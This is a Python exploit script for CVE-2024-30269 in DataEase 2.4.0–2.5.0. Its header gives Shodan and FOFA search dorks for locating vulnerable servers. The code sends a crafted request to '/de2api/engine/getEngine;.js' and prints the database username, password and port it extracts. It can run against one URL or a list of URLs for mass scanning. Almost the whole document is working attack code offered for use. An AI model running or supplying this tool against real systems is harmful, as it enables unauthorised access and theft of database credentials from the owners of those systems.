# Exploit Title: DataEase 2.4.0 - Database Configuration Information Exposure
# Shodan Dork: http.html:"dataease"                           #
# FOFA Dork: body="dataease" && title=="DataEase"             #
# Exploit Author: ByteHunter                                  #
# Email: 0xByteHunter@proton.me                               #
# vulnerable Versions: 2.4.0-2.5.0                            #
# Tested on: 2.4.0                                            #
# CVE : CVE-2024-30269                                        #
############################                                   #
################################################################

import argparse
import requests
import re
import json
from tqdm import tqdm

def create_vulnerability_checker():
    vulnerable_count = 0

    def check_vulnerability(url):
        nonlocal vulnerable_count
        endpoint = "/de2api/engine/getEngine;.js"
        full_url = f"{url}{endpoint}"
        headers = {
            "Host": url.split('/')[2],
            "Accept-Encoding": "gzip, deflate, br",
            "Accept": "*/*",
            "Accept-Language": "en-US;q=0.9,en;q=0.8",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36",
            "Connection": "close",
            "Cache-Control": "max-age=0"
        }

        try:
            response = requests.get(full_url, headers=headers, timeout=5)
            if response.status_code == 200:
                try:
                    json_data = response.json()
                    config = json_data.get("data", {}).get("configuration", None)

                    if config:
                        config_data = json.loads(config)

                        username = config_data.get("username")
                        password = config_data.get("password")
                        port = config_data.get("port")

                        if username and password:
                            vulnerable_count += 1
                            print(f"Vulnerable: {full_url}")
                            print(f"Username: {username}")
                            print(f"Password: {password}")
                            if port is not None:
                                print(f"Port Number: {port}")

                except (json.JSONDecodeError, KeyError):
                    print(f"Invalid JSON response from {full_url}")

        except requests.RequestException:
            pass

        return vulnerable_count

    return check_vulnerability

def main():
    parser = argparse.ArgumentParser(description="CVE-2024-30269 DataEase Database Creds Extractor")
    parser.add_argument('-u', '--url', type=str, help='Single target')
    parser.add_argument('-l', '--list', type=str, help='URL File List')
    args = parser.parse_args()

    check_vulnerability = create_vulnerability_checker()

    if args.url:
        check_vulnerability(args.url)
    elif args.list:
        try:
            with open(args.list, 'r') as file:
                urls = [url.strip() for url in file.readlines() if url.strip()]
            total_urls = len(urls)
            for url in tqdm(urls, desc="Processing URLs", unit="url"):
                check_vulnerability(url)
               # tqdm.write(f"Vulnerable Instances: {check_vulnerability(url)}/{total_urls}")
        except FileNotFoundError:
            print(f"File not found: {args.list}")
    else:
        print("provide a URL with -u or a file with -l.")

if __name__ == "__main__":
    main()